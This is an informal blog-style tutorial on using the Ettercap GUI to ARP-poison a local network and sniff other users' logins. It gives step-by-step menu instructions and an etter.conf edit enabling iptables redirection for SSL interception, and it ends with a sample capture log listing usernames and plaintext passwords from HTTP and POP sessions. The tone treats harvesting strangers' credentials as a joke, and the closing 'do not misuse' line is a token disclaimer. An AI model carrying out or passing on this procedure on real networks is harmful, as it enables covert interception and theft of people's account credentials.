It’s a easy to use GUI based sniffer. (Good news for people scared of command line).
Download and install the software on your PC from this link. Only source packages are available. Instructions for running on a Windows platform are here. I’ve not tried that yet.
For this hack to work, your PC needs to be on the network. You can’t do it from outside.
First click on Sniff –> Unified Sniffing
Then click on Hosts and input the list of hosts you want to snoop on. You can either feed a list of ips or let ettercap select online hosts in your subnet. I tried sniffing on hosts outside my subnet,(there is a reason why I had this idea of sniffing ) but that hasn’t worked well yet.
Click on Mitm (for newbies, MITM stands for Man In the Middle) and click on ARP poisoning. On next box, select Sniff remote connections
Click on Start –> Start Sniffing.
Now keep an eye on the output screen as the users login to websites. Their login details are displayed in plain text. :D
In case you don’t see anything, you may need to do a bit of work. Find the file ettercap.conf and remove the # sign from last two lines below.
# if you use iptables:
#redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $
#redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$
ettercap.conf file is placed in /usr/local/etc.
Here is a sample of what I captured on one of my networks. Details have been changed to protect the innocents. :P
Listening on eth0… (Ethernet)
eth0 -> 00:A2:81:99:BA:01 10.17.167.60 255.255.255.0
SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
26 hosts added to the hosts list…
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…
HTTP : 10.17.167.24:8080 -> USER: a23bb2-dc2d-4435-be54-cbf8a64431cb PASS: HTRnheQp INFO: http://online.speedbit.com/online/update.aspx?CV=188.8.131.52&
DHCP: [00:0D:60:9F:10:0E] REQUEST 10.17.167.188
DHCP: [10.17.167.1] ACK : 10.17.167.188 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “smtup.com”
POP : 10.17.166.21:110 -> USER: user.one PASS: mypass1234
HTTP : 184.108.40.206:80 -> USER: 4f3ab8b2-dc2d-c245-a654-0ca8a64431cb PASS: nRHh6Pq INFO: online.speedbit.com/
DHCP: [10.17.167.1] ACK : 10.17.167.169 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “mydomain.com”
HTTP : 220.127.116.11:80 -> USER: mantris PASS: yourpass INFO: http://www.rediff.com
DHCP: [00:23:E6:1B:FD:7F] REQUEST 10.17.16.69
DHCP: [10.17.16.1] ACK : 10.17.167.69 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.3 “mydomain.com”
HTTP : 10.17.16.24:8080 -> USER: kaykay PASS: batman INFO: http://www.rediff.com/index.html
Do not misuse this information. I use this tool only to monitor traffic for illegal activities on my network.